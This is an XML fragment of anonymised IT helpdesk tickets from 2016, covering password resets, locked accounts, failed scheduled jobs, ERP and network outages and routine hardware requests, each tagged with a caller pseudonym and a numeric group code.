    <s v="hello,_x000d__x000a__x000d__x000a_we understand from  order booking team that   while  booking order   since yesterday ,   they have come across    many mm's with '0' tax rate  ._x000d__x000a__x000d__x000a_material country jivp jivc csr name prod. hierarchy_x000d__x000a_6740704 in 2 2 chandmt t0130sww0ah2_x000d__x000a_5146604 in 2 2 chandmt t0130pssh0ru_x000d__x000a_4869277 in 2 2 chandmt t0130sww0ah2_x000d__x000a_5146697 in 2 2 chandmt t0130pssh0ru_x000d__x000a__x000d__x000a_list of few items which has '0' tax rate  is given above _x000d__x000a__x000d__x000a_at present they are booking order   with correct  tax rate  in oa ._x000d__x000a__x000d__x000a_request your assistance    in resolving this   on top priority as we  have put on hold all invoicing   . _x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="20"/>
  </r>
  <r>
    <s v="need help in reset password in password_management_tool password manager"/>
    <s v="need help in reset password in password_management_tool password manager"/>
    <s v="asthifne baehplqt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkbackup_tool_reporting_tool_prod_inc at 08/12/16 00:14:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkbackup_tool_HostName_771_prod_full"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkbackup_tool_HostName_771_prod_full at 08/12/16 00:06:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account lokced in erp SID_34"/>
    <s v="account lokced in erp SID_34"/>
    <s v="vtbqgwnk tamfbgjy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="recall: ticket_no1536413 -- comments added"/>
    <s v="_x000d__x000a__x000d__x000a_received from: franhtyu.liu@company.com_x000d__x000a__x000d__x000a_franhtyu liu would like to recall the message, &quot;ticket_no1536413 -- comments added&quot;._x000d__x000a__x000d__x000a__x000d__x000a_æœ¬è®¯æ¯ä»…ä¾›æŒ‡å®šçš„æŽ¥æ”¶äººä½¿ç”¨ï¼Œå…¶ä¸­å¯èƒ½åŒ…å«é€‚ç”¨æ³•å¾‹é¡¹ä¸‹ç‰¹è®¸çš„ã€ä¿å¯†çš„å’Œç¦æ­¢æŠ«éœ²çš„å†…å®¹ã€‚é™¤æŒ‡å®šçš„æŽ¥æ”¶äººå¤–ï¼Œä¸¥ç¦å…¶ä»–ä»»ä½•äººä¼ æ’­ã€åˆ†å‘æˆ–å¤åˆ¶æœ¬è®¯æ¯ã€‚å¦‚æžœæ‚¨è¯¯æ”¶åˆ°æœ¬è®¯æ¯ï¼Œè¯·é€šçŸ¥å‘ä»¶äººå¹¶å°†è®¯æ¯åˆ é™¤ã€‚_x000d__x000a_[_x000d__x000a_select the following link to view the disclaimer in an alternate language. "/>
    <s v="vblmcyax vlaorjum"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_38hotf"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_38hotf at 08/11/16 23:06:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="issue with bex,business_client"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ypuaejsc.yoxrqtsn@gmail.com_x000d__x000a__x000d__x000a_dear sir/madam,_x000d__x000a__x000d__x000a_i am not able to access bex as well as business_client._x000d__x000a__x000d__x000a_pl rectify immediately. its urgent._x000d__x000a__x000d__x000a_"/>
    <s v="ypuaejsc yoxrqtsn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="vwdghyai pjehycoz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="required 20 gb additional memory in e drive for server HostName_1042 _ please check attachment"/>
    <s v="required 20 gb additional memory in e drive for server HostName_1042 _ please check attachment"/>
    <s v="cubdsrml znewqgop"/>
    <x v="11"/>
  </r>
  <r>
    <s v="not able to login to skype"/>
    <s v="not able to login to skype"/>
    <s v="rjlnszei kneatvfu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="m drive access"/>
    <s v="_x000a__x000a_received from: uisewznr.ewtmkphs@gmail.com_x000a__x000a_hi team,_x000a__x000a_i have lost access to the m drive on my computer. please see the screenshots below. this same issue is occurring for walfgtkek and tagsyrhu. can you please arrange for this access to be reinstated? "/>
    <s v="uisewznr ewtmkphs"/>
    <x v="11"/>
  </r>
  <r>
    <s v="circuit outage : usa secondary circuit is down since 06:28pm et on 08/11"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____06:28pm et on 08/11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yes_______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  __email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x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1623"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1623 at 08/11/16 18:26:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1488"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1488 at 08/11/16 18:22:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1491"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1491 at 08/11/16 18:22:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1493"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1493 at 08/11/16 18:22:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2114"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2114 at 08/11/16 17:32:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to access emails "/>
    <s v="unable to access emails "/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: hr_tooldcvcgenratn"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: hr_tooldcvcgenratn at 08/11/16 17:02:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2318"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2318 at 08/11/16 17:01:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to create delivery"/>
    <s v="please provide the following:_x000d__x000a__x000d__x000a_what order number?  35853596_x000d__x000a__x000d__x000a_what material or item number?  10_x000d__x000a__x000d__x000a_what warehouse location?   plant_123_x000d__x000a__x000d__x000a_issue description / error message?   value of modific counter for document 35853596 in supply_chain is 1, but should be 6"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp is down - distributor_tool / company center customers are not able to place transactions"/>
    <s v="erp is down - distributor_tool / company center customers are not able to place transactions.  customer service is not able to place transactions in ecc "/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="0"/>
  </r>
  <r>
    <s v="md04, display stock, is locking up with create delivery, 30min to 1hr, had to close out window, still didnt process"/>
    <s v="the window is locked up, can't do screenshots, just a spinning circle"/>
    <s v="wkeiqpud dzgemhbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp down"/>
    <s v="user id - vaugtyghtl_x000a_issue - erp down_x000a_location - usa_x000a_no of users affected - 15+_x000a_system - erp SID_34 erp production_x000a_issue - just clocking_x000a_contact no - _x000a_server name - HostName_196_x000a_transaction - md04._x000a_"/>
    <s v="damuphws arkulcoi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="mobile device activation_x000a__x000a__x000a_name:mikhghytr karaffa_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vfrdxtqw.jfbmsenz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:requesting email to my personal iphone."/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp produktion hÃ¤ngt bei ot03 auftrÃ¤gen"/>
    <s v="ot01 auftrÃ¤ge funktionieren, ot03 auftrÃ¤ge lassen sich nicht bearbeiten ( beim ausliefern)"/>
    <s v="jftsvazy ypqmliwa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1953d"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1953d at 08/11/16 16:08:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="outage on erp SID_34"/>
    <s v="outage on erp SID_34"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="german call"/>
    <s v="german call"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="totalteamsales sproc is not assigning direct team revenue to employees"/>
    <s v="totalteamsales sproc is not assigning direct team revenue to employees"/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="skype shows i am online but i am not"/>
    <s v="i have noticed that i received by email some messages of skype for business even when i am off line. i did a uacyltoe hxgaycze, i have turned off my pc and smartphone, and from the pc of my colleagues it shows i am &quot;inactive or away&quot;. then people send me message. "/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="need ticket  zmm_stock_transfer"/>
    <s v="_x000a__x000a_received from: dqplrwoy.cutpwjie@gmail.com_x000a__x000a_programdnty zmm_stock_transfer is not processing.  it's been on an eternal circle._x000a__x000a_franhtyu â€“ rebalancing not completing._x000a__x000a_dqplrwoy cutpwjie_x000a_supply chain planner_x000a_dqplrwoy.cutpwjie@gmail.com&lt;mailto:dqplrwoy.cutpwjie@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="dqplrwoy cutpwjie"/>
    <x v="29"/>
  </r>
  <r>
    <s v="install a printer in maintenance area"/>
    <s v="install a printer in maintenance area"/>
    <s v="ifsrenpq lkembgtd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="how did you determine there are network problems  erp SID_34_x000d__x000a__x000d__x000a_is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow) yes erp slow_x000d__x000a__x000d__x000a_are more than one transactions impacted yes _x000d__x000a__x000d__x000a_what erp server are you on (server name is located in the status bar at the bottom _x000d__x000a_right of your screen)  HostName_200_x000d__x000a__x000d__x000a_do other co-workers also notice slow response times in erp - yes, four users at usa _x000d__x000a__x000d__x000a_what other applications are running slow - erp SID_34_x000d__x000a__x000d__x000a_can you access your data files on the server _x000d__x000a__x000d__x000a_any other comments or issues with other systems ?"/>
    <s v="gbxctqfl akrwmuib"/>
    <x v="0"/>
  </r>
  <r>
    <s v="application response time (other network resources work normally)"/>
    <s v="please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the &quot;operations&quot; folder)._x000a_site / location :  usa_x000a_user id (ad) : dinkifgtrl_x000a_system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj): SID_34 erp production //  server name - HostName_201_x000a_transactions that are slow (e.g., va01, create an order): quotes and orders // va01, va21_x000a_area this belongs to (e.g., sales, finance, markhtyeting etc.):  sales (as per robhyertyj)_x000a_how can this issue be replicated by the it support group: _x000a_are other users seeing this? yes, 40+_x000a_please attach relevant screenshots and exact times when the issue occurred: attached_x000a__x000a_user name - robhyertyj l dinfgrtyukins_x000a_contact no - "/>
    <s v="itylnjqw kqiurhbt"/>
    <x v="12"/>
  </r>
  <r>
    <s v="check my security for the ethics collaboration_platform page"/>
    <s v="_x000a__x000a_received from: azxhejvq.fyemlavd@gmail.com_x000a__x000a_hi,_x000a_please check my security for the ethics collaboration_platform page.  i am trying to upload a file to the &quot;procedures&quot; category folder.  i was able to upload to the noname category, but for some reason i cannot upload into procedures.  i suspect a security setting._x000a__x000a__x000a__x000a__x000a_[cid:image001.png@01d1f3e3.d3542d50]_x000a__x000a_mikhghytr wafglhdrhjop_x000a_sr. manager, global ethics and compliance programdntys_x000a__x000a__x000a__x000a_"/>
    <s v="azxhejvq fyemlavd"/>
    <x v="27"/>
  </r>
  <r>
    <s v="problem"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_when i try to submit a discount form i get the below error. please advise._x000a__x000a_[cid:image001.jpg@01d1f3d7.bdb9e590]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1967d"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1967d at 08/11/16 14:53:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="site contact reported circuit outage in south amerirtca"/>
    <s v="santiago-south amerirtca has reported that today (11/08/2016) between 12:40pm and 1:10pm (30 minutes), the dmvpn was not working. they have contacted the local isp which confirmed that the internet circuit was working fine._x000d__x000a_could you please investigate the logs of the router and let us know your findings?_x000d__x000a_i am surprised that datacenter team did not contacted us about that issue._x000d__x000a_ "/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="3"/>
  </r>
  <r>
    <s v="circuit outage:apac/fengapac - (company) vpn circuit is down at 2:14 pm et on 08/11. site is up on primary circuit."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______2:14 pm et on 08/11_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_yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ____yes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unable to login to SID_1 using erp gui"/>
    <s v="hi,_x000d__x000a_i am unable to login to SID_1 today and i see the error shown in the screenshots._x000d__x000a_request your help at the earliest since i'm trying to uacyltoe hxgaycze something related to engineering_tool._x000d__x000a_"/>
    <s v="fyuqhlcx fjiuhxae"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="jcxwgslk szvgufir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage: india, india site is hard down at 1:29pm et on 08/11."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______1:29pm et on 08/11._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no(yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___no_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na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programdnty in erp not loading"/>
    <s v="programdnty in erp not loading"/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise"/>
    <s v="blank call // loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="license query "/>
    <s v="hello ,_x000d__x000a_please arrange that mrs de gracia fernandez ghjkzalez (100783) a k1 (access to your payroll) gets approval._x000d__x000a_"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lhqsm674 (kas hfyujqti jdcbiezx2): average (4 samples) disk free on c:\ is now 9%, which is below the warning threshold."/>
    <s v="lhqsm674 (kas hfyujqti jdcbiezx2): average (4 samples) disk free on c:\ is now 9%, which is below the warning threshold (10%) out of total size 75.0 gb"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="npc 311190861. please refer screenshot."/>
    <s v="npc 311190861. mrp type incorrect error. "/>
    <s v="wgyzrovu boerxlmw"/>
    <x v="10"/>
  </r>
  <r>
    <s v="application response time (other network resources work normally)"/>
    <s v="please provide details in the template below (if multiple applications are impacted, please use the quick ticket template in the &quot;operations&quot; folder)._x000a_site / location :  corporate_x000a_user id (ad) :  prohgtyarb_x000a_system you are seeing performance problems on (please list all) (e.g., crm, erp, bw, bobj):  workflow_x000a_transactions that are slow (e.g., va01, create an order):  quote_x000a_area this belongs to (e.g., sales, finance, markhtyeting etc.):  sales_x000a_how can this issue be replicated by the it support group: _x000a_are other users seeing this? _x000a_please attach relevant screenshots and exact times when the issue occurred: q#3116214820 is stuck in my workflow, when i try to go in it, says i am in it, and i cannot save it out"/>
    <s v="jpufgorh xltfrpcy"/>
    <x v="12"/>
  </r>
  <r>
    <s v="major problem with inventory"/>
    <s v="the needs to be sev2.  because it heavily limits the amount of production i can put out on the floor. also, multiple people and departments are affected, not just me. this includes many additional man-hours._x000d__x000a__x000d__x000a_received from: lijrvdgh.wfhmdsoa@gmail.com_x000d__x000a__x000d__x000a_i am having an issue with the oracle powder charging system automatically issuing material to production orders in erp.  we are having to use many extra man hours manually entering in the data in erp.  also, this problem dramdntyatically decreases the efficiency and accuracy or issuing production orders._x000d__x000a__x000d__x000a_"/>
    <s v="lijrvdgh wfhmdsoa"/>
    <x v="44"/>
  </r>
  <r>
    <s v="unable to log in to windows"/>
    <s v="unable to log in to windows"/>
    <s v="bfmlysrk olbthfqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" usa, ar - pbx (rqxaudix.company.com) is down since 11:24am on 08/11/16"/>
    <s v=" usa, ar - pbx (rqxaudix.company.com) is down since 11:24am on 08/11/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="access to security group : k-gshn"/>
    <s v="_x000a_summary:please add me to the k-gshn e-mail group.  "/>
    <s v="kmubdazp qmxwszko"/>
    <x v="19"/>
  </r>
  <r>
    <s v="plug in not responding error in erp"/>
    <s v="plug in not responding error in erp"/>
    <s v="wbqtfzdv aectbluw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error message in pthsqroz moedyanvess"/>
    <s v="_x000a_erp pthsqroz moedyanvess_x000a_error message: &quot;object notification: business operation not entered in your user master'_x000a__x000a_"/>
    <s v="hseazwyd tmisvleo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="outlook goes to not responding"/>
    <s v="outlook goes to not responding"/>
    <s v="tqpbazxm jhbkycgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wanted to reset internet explorer "/>
    <s v="user wanted to reset internet explorer "/>
    <s v="gwkjrobm wrsznjmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked out "/>
    <s v="account locked out "/>
    <s v="qctdugsi bfqlgvos"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 erp production account locked "/>
    <s v="erp SID_34 erp production account locked "/>
    <s v="dskcobqa tujrvsbc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="transfer information from old to new laptop"/>
    <s v="transfer information from old to new laptop"/>
    <s v="pahdlbnw nycrtsom"/>
    <x v="2"/>
  </r>
  <r>
    <s v="can't print in color"/>
    <s v="color printer not working"/>
    <s v="chkmejsn lvidgknc"/>
    <x v="2"/>
  </r>
  <r>
    <s v="HostName_562"/>
    <s v="i'm unable to reach the destination server ... is it offline ?"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="zpress does not save data for material 5666264"/>
    <s v="zpress does not save data for material 6777375, pl. check for order no 115697658"/>
    <s v="bqjvxsaf aupdonjy"/>
    <x v="20"/>
  </r>
  <r>
    <s v="can not join skype meeting"/>
    <s v="can not join skype meeting"/>
    <s v="paqrentz gcnyaxsb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc aufstellen"/>
    <s v="bitte an smpijawb eawkpgqf weiterleiten:_x000d__x000a_nachdem das alicona messgerÃ¤t umgestellt wurde, muss der pc fÃ¼r sdnemlwy dsbmgonk aufgebaut werden (apl vor juchaomy gaxrulwo - av abstechprogramdntym)._x000d__x000a_soll termin bis 26.august_x000d__x000a_mitarbeiterin kommt am 29.august zurÃ¼ck"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="41"/>
  </r>
  <r>
    <s v="arbeitsplatz umziehen"/>
    <s v="bitte an smpijawb eawkpgqf weiterleiten:_x000d__x000a_alicona messgerÃ¤t muss von av abstechprogramdntym in halle 4 (ehem. ventilstÃ¶ÃŸel kontrolle) umgestellt werden._x000d__x000a_soll termin in kw 33"/>
    <s v="mvwiygou rpkscnlv"/>
    <x v="41"/>
  </r>
  <r>
    <s v="unable to launch outlook and skype"/>
    <s v="unable to launch outlook and skype"/>
    <s v="xeocpjsu hqwxumfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to q drive for pollaurid w"/>
    <s v="_x000d__x000a_received from: inhekdol.anvqzdif@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_can you help to put in a ticket for access to the quality assurance drive (q) for employee uqjbkydr bsqofdlx (username: whalep) aerp?_x000d__x000a__x000d__x000a_i have copied the &quot;owner&quot; of the drive: eozqgims rbmosifh, quality manager for permission reasons._x000d__x000a__x000d__x000a_"/>
    <s v="inhekdol anvqzdif"/>
    <x v="11"/>
  </r>
  <r>
    <s v="flash player incompatibility"/>
    <s v="flash player incompatibility"/>
    <s v="zdcheloy aevzsogn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no audio device installed "/>
    <s v="no audio device installed "/>
    <s v="vbihmtzo mphkitvr"/>
    <x v="62"/>
  </r>
  <r>
    <s v="wifi not working "/>
    <s v="wifi not working "/>
    <s v="elphfvdt ileozacs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need help in connecting a skype meeting that is coming up with an error"/>
    <s v="need help in connecting a skype meeting that is coming up with an error"/>
    <s v="dtisfuyp fpvrjlkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open pdf files."/>
    <s v="unable to open pdf files in user system"/>
    <s v="lediwjvb tqijrdgw"/>
    <x v="18"/>
  </r>
  <r>
    <s v="not able to use command field"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ulroqsyf.wctpnarb@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to use command field. by default it is taking mc+e._x000d__x000a_pl. help_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f3f8.207cbde0]_x000d__x000a__x000d__x000a_"/>
    <s v="ulroqsyf wctpnarb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="microsoft .net framdntyework 4.5 missing"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kuznvase.jrxtbuqz@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a_please open ticket and address shortly._x000d__x000a_"/>
    <s v="kuznvase jrxtbuqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver will not start"/>
    <s v="i receive an error message when trying to start business_client. &quot;microsoft net framdntyework 4.5 is not installed&quot; i upgraded my knovel software last night and now i am receiving this message._x000a_ ext 133 ( ldil8514566)"/>
    <s v="rmxqfivn pfgcirlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please, send me a link for password_management_tool password manager."/>
    <s v="please, send me a link for password_management_tool password manager."/>
    <s v="cedxqshz sepbvatm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype funktionert nicht."/>
    <s v="from: zlnxswvp ptmzsbhk _x000d__x000a_sent: thursday, august 11, 2016 11:58 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: sab : wg: skype lÃ¤sst sich nicht starten_x000d__x000a__x000d__x000a_bitte um unterstÃ¼tzung _x000d__x000a__x000d__x000a_freundliche gruesse / kind "/>
    <s v="zlnxswvp ptmzsbhk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="headset"/>
    <s v="connecting the plantronic headset beshryuwire c725 with thecomputer the speaker of the computer is turned on, too._x000d__x000a_how can it be turned off._x000d__x000a__x000d__x000a_note: the issue already was solved."/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="0"/>
  </r>
  <r>
    <s v="datenÃ¼bertragung"/>
    <s v="_x000d__x000a__x000d__x000a_received from: weszfyok.fbadnjhu@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_es gibt anscheinend probleme bei der Ã¼bertragung von stempelzeiten ( EU_tool / erp ) bei 8-stelligen personalnummern ( siehe unten )_x000d__x000a__x000d__x000a_freundliche grÃ¼ÃŸe_x000d__x000a_weszfyok fbadnjhu_x000d__x000a__x000d__x000a__x000d__x000a_von: axesnghb cyzuomxa_x000d__x000a_gesendet: donnerstag, 28. juli 2016 12:17_x000d__x000a_an: zslugaxq dtwlrofu; laeusvjo fvaihgpx_x000d__x000a_cc: weszfyok fbadnjhu_x000d__x000a_betreff: leihmitarbeiter lochthowe, andre, 21111177_x000d__x000a__x000d__x000a__x000d__x000a_hallo zusammen,_x000d__x000a__x000d__x000a_seit dem 21.07.2016  stempelt herr lochthowe mit seiner karte in EU_tool ._x000d__x000a__x000d__x000a_seit dem zeitpunkt werden die daten nicht an erp Ã¼bertragen._x000d__x000a__x000d__x000a_hier stimmt etwas nicht mit der  karten- nr.  oder der stammnummer._x000d__x000a__x000d__x000a_wir haben hier den ersten mitarbeiter mit einer  achtstelligen stammnummer._x000d__x000a__x000d__x000a_kann es daran liegen ????_x000d__x000a__x000d__x000a_bitte  mal prÃ¼fen._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen_x000d__x000a_best "/>
    <s v="weszfyok fbadnjhu"/>
    <x v="25"/>
  </r>
  <r>
    <s v="bobj webi jobs are not running"/>
    <s v="bobj webi jobs are not running. please investigate at the earliest."/>
    <s v="froajhdb ijetmkuc"/>
    <x v="13"/>
  </r>
  <r>
    <s v="international payments rejected for payment method &quot;l&quot;"/>
    <s v="_x000d__x000a_von: pradyhtueep yyufs _x000d__x000a_gesendet: 10 august 2016 09:10_x000d__x000a_an: ubiqcrvy mxjcnqfs; nathyresh gayhtjula; -erp-fico; ebusaar munnangi_x000d__x000a_cc: iszaguwe bdfzamjs; pkjhmfgc zuvjqgwa; joacrhfz ctrbjusz; maryhtutina bauuyternfeyt_x000d__x000a_betreff: re: zahllauf nicht ausgefÃ¼hrt - international payments rejected_x000d__x000a__x000d__x000a_jartnine,_x000d__x000a__x000d__x000a_we are looking into the development changes which were implemented recently. we will get back to you by tomorrow._x000d__x000a__x000d__x000a_sorry for any inconvenience._x000d__x000a__x000d__x000a_"/>
    <s v="ubiqcrvy mxjcnqfs"/>
    <x v="9"/>
  </r>
  <r>
    <s v="laptop doesnt stay on , power light stays on for 1 minute only and goes off."/>
    <s v="_x000d__x000a_laptop doesnt stay on , power light stays on for 1 minute only and goes off._x000d__x000a__x000d__x000a__x000d__x000a_from: bmhxwvys tdmgolwn _x000d__x000a_sent: thursday, august 11, 2016 3:08 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: zrpemyab xvzwcbha_x000d__x000a_subject: tru : fw: damaged laptop_x000d__x000a__x000d__x000a__x000d__x000a_dear sir_x000d__x000a__x000d__x000a_damage dell laptop lit only 1 minute in, see attachment_x000d__x000a_thank for the response and cooperation._x000d__x000a__x000d__x000a_best "/>
    <s v="bmhxwvys tdmgolwn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="erp password reset in SID_34"/>
    <s v="erp password reset in SID_34"/>
    <s v="vtbqgwnk tamfbgjy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp log on problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pgeknaxy.usokqprd@gmail.com_x000d__x000a__x000d__x000a_hello team,_x000d__x000a__x000d__x000a_i can not log on erp with my password._x000d__x000a__x000d__x000a_could you help me for this issue?_x000d__x000a__x000d__x000a_"/>
    <s v="pgeknaxy usokqprd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset alert from o365 for user lafgturie sherwtgyu"/>
    <s v="password reset alert from o365"/>
    <s v="zliatqeo nrukzxit"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when connecting to hr_tool, etime window will open but nothing populates the screen. empty screen for etime, no access."/>
    <s v=", hr_tool portal access through single sign-on not working. "/>
    <s v="nrmjhuox ktuyqewp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business card request"/>
